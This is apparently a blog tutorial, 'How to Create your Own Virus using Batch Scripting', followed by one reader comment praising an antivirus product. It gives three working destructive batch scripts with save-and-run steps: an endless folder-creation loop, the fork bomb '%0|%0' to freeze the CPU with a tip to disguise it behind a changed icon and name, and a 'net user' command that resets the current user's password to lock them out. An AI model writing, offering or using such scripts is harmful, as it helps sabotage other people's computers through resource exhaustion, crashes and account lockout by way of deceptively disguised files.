1
Yes, we all know what virus is and how it totally overrides your computer, some of the viruses are pretty easy to remove but some other are quite hard to delete them. Using an antivirus is great idea especially when you are using Internet or USB flash drives. You don't know how those viruses are really compiled and created, almost 90% of computer viruses are made by simple programming language like C#, Visual Basic, Java and Batch Scripting which we are going to use in this tutorial.






How to Create your Own Virus using Batch Scripting



1.  Make an Infinity of Folders :


  1) Open Notepad
  2) Paste the following code:

@echo off
:ztuts
md %random%
goto ztuts

 3) Now click File > Save as...  and save it as "folders.bat" 



2. Freezes the CPU 


  1) Open up Notepad
  2) Paste the following code:

%0|%0

  3) Save it as : "CPU.bat"
  4) You can also customize this Bat file by creating a shortcut of it, changing its icon then rename it.


3. Change Computer Password


  1) Launch Notepad
  2) Paste the following code:
  
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::


Note: Change "Razor" to anything you want, that will be the pass.

  3) Save it as "anything.bat"
  4) Done!

Post a Comment

  1. I'm using AVG protection for a number of years now, I'd recommend this Anti virus to everyone.

    ReplyDelete

 
Top